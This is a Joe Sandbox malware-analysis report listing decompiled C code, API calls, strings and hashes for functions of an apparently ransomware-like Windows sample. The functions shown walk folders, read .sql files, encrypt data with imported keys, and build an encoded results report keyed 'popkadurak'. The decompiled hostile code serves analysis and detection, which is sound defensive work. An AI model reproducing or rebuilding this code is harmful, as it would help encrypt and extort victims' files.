API ID: Virtual$Freelstrlen$Alloc$Heap$BinaryCloseCryptErrorHandleInternetLastStringlstrcatlstrcpy
String ID: POST$popkadurak
API String ID: 1287001821-2707760125
Opcode ID: 4995e832fd23e7df4cce26c63528659734334da3955162534756027a01868290
Instruction ID: 0acf0bfd5f88af70ea37a5ea26910a81c56c2851eb5e45c9926d788692104269
Opcode Fuzzy Hash: 4995e832fd23e7df4cce26c63528659734334da3955162534756027a01868290
Instruction Fuzzy Hash: 6E71D375E40309ABEB109FA59C45FAEBB79EFC8B12F140115FA04A7241DB78B5A4CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0F145670 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 169
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0F145670(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _v12;
				int _v16;
				void* _v20;
				char _v164;
				void* __esi;
				BYTE* _t33;
				int _t41;
				CHAR* _t44;
				int _t52;
				void* _t53;
				char _t60;
				BYTE* _t65;
				char* _t69;
				signed int _t70;
				void* _t75;
				signed int _t78;
				CHAR* _t85;
				int _t87;
				long _t88;
				void* _t89;
				void* _t91;
				void* _t94;

				_t82 = __edx;
				_t70 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t33 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v20 = _t33;
				if(_t33 == 0) {
					_t65 = 0;
					_t85 = 0;
				} else {
					_t4 =  &(_t33[0x800]); // 0x800
					_t85 = _t4;
					_t65 = _t33;
				}
				_push(_v12);
				wsprintfW(_t65, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v8, _a4, _a8);
				_push(0);
				_push(_t70);
				_push(0);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_t94 = _t91 + 0x14;
				_push(0);
				_push(_t70);
				_push(0);
				E0F143BC0( &_v164);
				E0F147490( &_v164, _t82);
				E0F1472A0( &_v164);
				E0F1470A0( &_v164, _t65 + lstrlenW(_t65) * 2);
				_t41 = lstrlenW(_t65);
				_t75 =  *0xf152a78; // 0x0
				_v8 = _t41;
				if(_t75 != 0) {
					VirtualFree(_t75, 0, 0x8000);
				}
				_t44 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
				 *0xf152a78 = _t44;
				if(_t44 != 0) {
					wsprintfA(_t44, "%S", L"popkadurak");
					_t94 = _t94 + 0xc;
				}
				_t87 = _v8 + _v8;
				E0F145F00(_t65, _t87, _t87);
				_v16 = _v8 * 8;
				if(CryptBinaryToStringA(_t65, _t87, 0x40000001, _t85,  &_v16) == 0) {
					GetLastError();
				}
				_t22 = lstrlenA(_t85) + 4; // 0x4
				_t88 = _t22;
				_v12 = VirtualAlloc(0, _t88, 0x3000, 0x40);
				_t52 = lstrlenA(_t85);
				_t78 = _v12;
				_t53 = _t52 + 2;
				if(_t78 == 0) {
					L11:
					_v8 = 0;
				} else {
					_v8 = _t78;
					if(_t53 >= _t88) {
						goto L11;
					}
				}
				_t89 = 0;
				if(lstrlenA(_t85) != 0) {
					_t69 = _v8;
					do {
						_t60 =  *((intOrPtr*)(_t89 + _t85));
						if(_t60 != 0xa && _t60 != 0xd) {
							 *_t69 = _t60;
							_t69 = _t69 + 1;
						}
						_t89 = _t89 + 1;
					} while (_t89 < lstrlenA(_t85));
				}
				E0F1454F0(_v8, 0, _t78, 0);
				_t68 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E0F147D70( &_v164);
				VirtualFree(_v20, 0, 0x8000);
				_t59 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}

0x0f145670
0x0f145670
0x0f145690
0x0f145693
0x0f145696
0x0f145698
0x0f14569d
0x0f1456a9
0x0f1456ab
0x0f14569f
0x0f14569f
0x0f14569f
0x0f1456a5
0x0f1456a5
0x0f1456ad
0x0f1456bf
0x0f1456c8
0x0f1456ca
0x0f1456cb
0x0f1456d0
0x0f1456d2
0x0f1456d3
0x0f1456d5
0x0f1456d6
0x0f1456d8
0x0f1456d9
0x0f1456db
0x0f1456dc
0x0f1456de
0x0f1456e1
0x0f1456e3
0x0f1456e4
0x0f1456ec
0x0f1456f7
0x0f145702
0x0f145718
0x0f14571e
0x0f145724
0x0f14572a
0x0f14572f
0x0f145739
0x0f145739
0x0f145757
0x0f145759
0x0f145760
0x0f14576d
0x0f145773
0x0f145773
0x0f14577b
0x0f145780
0x0f14578f
0x0f1457a6
0x0f1457a8
0x0f1457a8
0x0f1457be
0x0f1457be
0x0f1457cb
0x0f1457ce
0x0f1457d0
0x0f1457d3
0x0f1457d8
0x0f1457e1
0x0f1457e1
0x0f1457da
0x0f1457da
0x0f1457df
0x00000000
0x00000000
0x0f1457df
0x0f1457e9
0x0f1457ef
0x0f1457f1
0x0f1457f4
0x0f1457f4
0x0f1457f9
0x0f1457ff
0x0f145801
0x0f145801
0x0f145803
0x0f14580a
0x0f1457f4
0x0f145816
0x0f145830
0x0f14583d
0x0f145845
0x0f145854
0x0f145858
0x0f14585e

APIs

VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0F145696
wsprintfW.USER32 ref: 0F1456BF
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F145708
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F14571E
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F145739
lstrlenW.KERNEL32(popkadurak,00003000,00000004,?,00000000,00000000,?,00000000), ref: 0F14574B
VirtualAlloc.KERNEL32(00000000,-00000002,?,00000000,00000000,?,00000000), ref: 0F145757
wsprintfA.USER32 ref: 0F14576D
CryptBinaryToStringA.CRYPT32(00000000,772966A0,40000001,00000000,?), ref: 0F14579E
GetLastError.KERNEL32(?,00000000,00000000,?,00000000), ref: 0F1457A8
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F1457B5
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,00000000,00000000,?,00000000), ref: 0F1457C4
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F1457CE
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F1457EB
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F145804
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F14583D
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F145854

Strings

popkadurak, xrefs: 0F145746, 0F145762
action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 0F1456B9

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$AllocFree$wsprintf$BinaryCryptErrorLastString
String ID: action=result&e_files=%d&e_size=%I64u&e_time=%d&$popkadurak
API String ID: 823394411-2102589890
Opcode ID: 7d51965d1e13a0745fe833b3a17a78f8a8b49cf2241c8a8c9eae4f14b81935e5
Instruction ID: 463c6c75a6dbe9c65ab20ed5b8e887b0670b2fe0e34c2c0a68e892fe15d89658
Opcode Fuzzy Hash: 7d51965d1e13a0745fe833b3a17a78f8a8b49cf2241c8a8c9eae4f14b81935e5
Instruction Fuzzy Hash: 1451C575A40304BFEB209F64DC46F9E7B79AF84B01F540068F605A71C1DBB4BA64CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0F146BA0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136
stringfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F146BA0(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0F148260(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E0F146B40(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}

0x0f146bab
0x0f146baf
0x0f146bbe
0x0f146bc1
0x0f146bc4
0x0f146bde
0x0f146be3
0x0f146be6
0x0f146bf0
0x0f146c00
0x00000000
0x0f146c1c
0x0f146c24
0x0f146c2b
0x0f146c31
0x0f146c34
0x0f146c39
0x0f146d08
0x0f146d08
0x00000000
0x0f146c40
0x0f146c40
0x0f146c46
0x0f146c49
0x0f146c4a
0x00000000
0x00000000
0x00000000
0x0f146c4a
0x0f146c4e
0x00000000
0x0f146c54
0x0f146c5a
0x0f146c5e
0x00000000
0x0f146c64
0x0f146c77
0x0f146c82
0x0f146c86
0x0f146c8f
0x0f146ca0
0x0f146ca4
0x0f146cb7
0x0f146cce
0x0f146cd4
0x0f146cde
0x0f146cde
0x0f146ce9
0x0f146ce9
0x0f146cef
0x0f146cef
0x0f146cf3
0x0f146cf9
0x0f146cfe
0x0f146d0a
0x0f146d0f
0x00000000
0x0f146d0f
0x0f146cfe
0x0f146c5e
0x0f146c4e
0x0f146c39
0x00000000
0x0f146d12
0x0f146d22
0x0f146d2d
0x0f146d3b

APIs

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F146BB2
lstrcatW.KERNEL32(00000000,0F14FF44), ref: 0F146BC4
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F146BD2
lstrcmpW.KERNEL32(?,0F14FF48,?,?), ref: 0F146BFC
lstrcmpW.KERNEL32(?,0F14FF4C,?,?), ref: 0F146C12
lstrcatW.KERNEL32(00000000,?), ref: 0F146C24
lstrlenW.KERNEL32(00000000,?,?), ref: 0F146C2B
lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F146C5A
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F146C71
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F146C7C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F146C9A
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F146CAF
lstrlenA.KERNEL32(*******************,?,?), ref: 0F146CCE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F146CE9
CloseHandle.KERNEL32(00000000,?,?), ref: 0F146CF3
FindNextFileW.KERNEL32(?,?,?,?), ref: 0F146D1C
FindClose.KERNEL32(?,?,?), ref: 0F146D2D

Strings

*******************, xrefs: 0F146CB9, 0F146CC9
.sql, xrefs: 0F146C54

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
String ID: *******************$.sql
API String ID: 3616287438-58436570
Opcode ID: 46b5185c1a2d721f75edd701e06f1f43e6b7b44bc7591706724ec7d68c76ec80
Instruction ID: 46ef9007ec0287b104bf2d16eed319b7b1fa456369d272ddf1411933451aea4e
Opcode Fuzzy Hash: 46b5185c1a2d721f75edd701e06f1f43e6b7b44bc7591706724ec7d68c76ec80
Instruction Fuzzy Hash: 0A41C275640215ABDB209F60CC48FAFB7BCEF85719F414065F901E3141EB79BA65CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0F146660 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 89
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0F146660(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0xf152a48);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
						_t31 =  &_v20;
						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E0F1436C0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0xf152a48);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}

0x0f14666b
0x0f146671
0x0f146678
0x0f14668d
0x0f146691
0x0f146699
0x0f1466d1
0x0f1466d1
0x0f1466f4
0x0f1466f6
0x0f1466ff
0x0f14670d
0x0f146713
0x0f146719
0x0f146727
0x0f146735
0x0f14673b
0x0f146744
0x0f14674b
0x0f146750
0x0f146750
0x0f14674b
0x0f14675b
0x0f146766
0x00000000
0x0f14676c
0x0f14669b
0x0f1466a6
0x00000000
0x0f1466ca
0x0f1466b7
0x0f1466bf
0x00000000
0x0f1466c8
0x00000000

APIs

EnterCriticalSection.KERNEL32(0F152A48,?,0F1438F4,00000000,00000000,00000000,?,00000800), ref: 0F14666B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0F1438F4,00000000,00000000,00000000), ref: 0F146691
GetLastError.KERNEL32(?,0F1438F4,00000000,00000000,00000000), ref: 0F14669B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F1438F4,00000000,00000000,00000000), ref: 0F1466B7
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0F1438F4,00000000,00000000), ref: 0F1466EC
CryptGetKeyParam.ADVAPI32(00000000,00000008,0F1438F4,0000000A,00000000,?,0F1438F4,00000000), ref: 0F14670D
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0F1438F4,?,0F1438F4,00000000), ref: 0F146735
GetLastError.KERNEL32(?,0F1438F4,00000000), ref: 0F14673E
CryptReleaseContext.ADVAPI32(00000000,00000000,?,0F1438F4,00000000,00000000), ref: 0F14675B
LeaveCriticalSection.KERNEL32(0F152A48,?,0F1438F4,00000000,00000000), ref: 0F146766

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0F146686, 0F1466AC

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 72144047-1948191093
Opcode ID: 1f5c5b933a134f77f7781c1bf0b544bbb1ae0a007917866a18d974f4cb27255a
Instruction ID: 98fde12f312e2d3649159e3d5ac61c3a16295fd4a9f2904b6d7b25337c0033a8
Opcode Fuzzy Hash: 1f5c5b933a134f77f7781c1bf0b544bbb1ae0a007917866a18d974f4cb27255a
Instruction Fuzzy Hash: D0314375A40305BBEB10DFA0DD45F9E7774AF84715F104148F605A7180D7B9B9549FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0F146DF0 Relevance: 13.6, APIs: 9, Instructions: 109
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F146DF0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E0F146BA0(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E0F146D40(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if(__eflags == 0) {
										_v16 =  *_t54;
										_t46 = E0F146AB0(_t63,  &_v616, __eflags, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E0F146DF0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}

0x0f146dfc
0x0f146dff
0x0f146e01
0x0f146e08
0x0f146f36
0x0f146f36
0x0f146f3c
0x0f146e1d
0x0f146e1d
0x0f146e35
0x0f146e38
0x0f146e3b
0x0f146e45
0x0f146e4b
0x0f146e4d
0x0f146e50
0x0f146e56
0x0f146e64
0x0f146e70
0x0f146e7c
0x0f146e82
0x0f146e84
0x0f146e96
0x0f146e9c
0x0f146e9e
0x0f146ea8
0x0f146eaa
0x0f146eb1
0x0f146ee2
0x0f146ee5
0x0f146eea
0x0f146eed
0x0f146eef
0x0f146ef2
0x0f146ef5
0x0f146ef7
0x0f146f00
0x0f146f00
0x0f146f03
0x0f146f03
0x0f146ef9
0x0f146efc
0x0f146efe
0x00000000
0x00000000
0x0f146efe
0x0f146ef7
0x0f146eb3
0x0f146ec7
0x0f146ecc
0x0f146ecc
0x0f146f0e
0x0f146f0e
0x0f146f10
0x0f146f10
0x0f146e9e
0x0f146f1d
0x0f146f23
0x0f146f23
0x0f146f2e
0x00000000
0x0f146e58
0x0f146e63
0x0f146e63
0x0f146e56

APIs

Part of subcall function 0F146780: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F146E06,00000000,?,?), ref: 0F146793
Part of subcall function 0F146780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F146E06,00000000,?,?), ref: 0F14685A
Part of subcall function 0F146780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F146E06,00000000,?,?), ref: 0F146874
Part of subcall function 0F146780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F146E06,00000000,?,?), ref: 0F14688E
Part of subcall function 0F146780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F146E06,00000000,?,?), ref: 0F1468A8

Part of subcall function 0F146BA0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F146BB2
Part of subcall function 0F146BA0: lstrcatW.KERNEL32(00000000,0F14FF44), ref: 0F146BC4
Part of subcall function 0F146BA0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F146BD2
Part of subcall function 0F146BA0: lstrcmpW.KERNEL32(?,0F14FF48,?,?), ref: 0F146BFC
Part of subcall function 0F146BA0: lstrcmpW.KERNEL32(?,0F14FF4C,?,?), ref: 0F146C12
Part of subcall function 0F146BA0: lstrcatW.KERNEL32(00000000,?), ref: 0F146C24
Part of subcall function 0F146BA0: lstrlenW.KERNEL32(00000000,?,?), ref: 0F146C2B
Part of subcall function 0F146BA0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F146C5A
Part of subcall function 0F146BA0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F146C71
Part of subcall function 0F146BA0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F146C7C
Part of subcall function 0F146BA0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F146C9A
Part of subcall function 0F146BA0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F146CAF

Part of subcall function 0F146D40: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F146E22,00000000,?,?), ref: 0F146D55
Part of subcall function 0F146D40: wsprintfW.USER32 ref: 0F146D63
Part of subcall function 0F146D40: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F146D7F
Part of subcall function 0F146D40: GetLastError.KERNEL32(?,?), ref: 0F146D8C
Part of subcall function 0F146D40: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F146DD8

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F146E23
lstrcatW.KERNEL32(00000000,0F14FF44), ref: 0F146E3B
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F146E45
lstrcmpW.KERNEL32(?,0F14FF48,?,?), ref: 0F146E7C
lstrcmpW.KERNEL32(?,0F14FF4C,?,?), ref: 0F146E96
lstrcatW.KERNEL32(00000000,?), ref: 0F146EA8
lstrcatW.KERNEL32(00000000,0F14FF7C), ref: 0F146EB9
FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F146F1D
FindClose.KERNEL32(00003000,?,?), ref: 0F146F2E

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: File$lstrcatlstrcmp$FindFolderPathSpecialVirtual$Alloclstrlen$CreateFirst$CloseErrorFreeLastNextReadSizewsprintf
String ID:
API String ID: 664581897-0
Opcode ID: f6a1567e7825f3426096630de81995b52de7f8d8a7404020e78de46528ebd260
Instruction ID: 95213dc7d620ce5b499ee82081deadc6832f0d27548237852a7733914f5b53dd
Opcode Fuzzy Hash: f6a1567e7825f3426096630de81995b52de7f8d8a7404020e78de46528ebd260
Instruction Fuzzy Hash: 6D31D171A00219EBCF14EF64DC849AEB7B8FFC6315B0041A5E904E7241EB35BA65CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0F1434F0 Relevance: 12.1, APIs: 8, Instructions: 79
memorystringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F1434F0(CHAR* __ecx, WCHAR** __edx, WCHAR** _a4) {
				int _v8;
				CHAR* _v12;
				WCHAR** _v16;
				long _t11;
				WCHAR* _t17;
				WCHAR* _t18;
				void* _t23;
				void* _t28;
				int _t29;
				WCHAR** _t30;

				_v16 = __edx;
				_v12 = __ecx;
				_t29 = 0;
				_t11 = lstrlenA(__ecx);
				_v8 = _t11;
				_t23 = VirtualAlloc(0, _t11, 0x3000, 4);
				if(_t23 != 0) {
					if(CryptStringToBinaryA(_v12, 0, 1, _t23,  &_v8, 0, 0) != 0) {
						_t17 = VirtualAlloc(0, 0x100, 0x3000, 4);
						_t30 = _v16;
						 *_t30 = _t17;
						_t18 = VirtualAlloc(0, 0x100, 0x3000, 4);
						_t28 = _t23;
						 *_a4 = _t18;
						if( *_t23 != 0x3b) {
							do {
								_t28 = _t28 + 1;
							} while ( *_t28 != 0x3b);
						}
						 *_t28 = 0;
						wsprintfW( *_t30, L"%S", _t23);
						_t8 = _t28 + 1; // 0x2
						wsprintfW( *_a4, L"%S", _t8);
						_t29 = 1;
					}
					VirtualFree(_t23, 0, 0x8000);
				}
				return _t29;
			}

0x0f1434fa
0x0f1434ff
0x0f143502
0x0f143504
0x0f143519
0x0f14351e
0x0f143522
0x0f14353d
0x0f14354c
0x0f14354e
0x0f14355f
0x0f143561
0x0f143566
0x0f14356b
0x0f14356d
0x0f143570
0x0f143570
0x0f143571
0x0f143570
0x0f143584
0x0f143587
0x0f143589
0x0f143597
0x0f14359c
0x0f14359c
0x0f1435a9
0x0f1435a9
0x0f1435b7

APIs

lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,0F143673,00000000), ref: 0F143504
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,0F143673,00000000), ref: 0F14351C
CryptStringToBinaryA.CRYPT32(0F143673,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F143535
VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0F143673,00000000), ref: 0F14354C
VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0F143673,00000000), ref: 0F143561
wsprintfW.USER32 ref: 0F143587
wsprintfW.USER32 ref: 0F143597
VirtualFree.KERNEL32(00000000,00000000,00008000,?,0F143673,00000000), ref: 0F1435A9

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

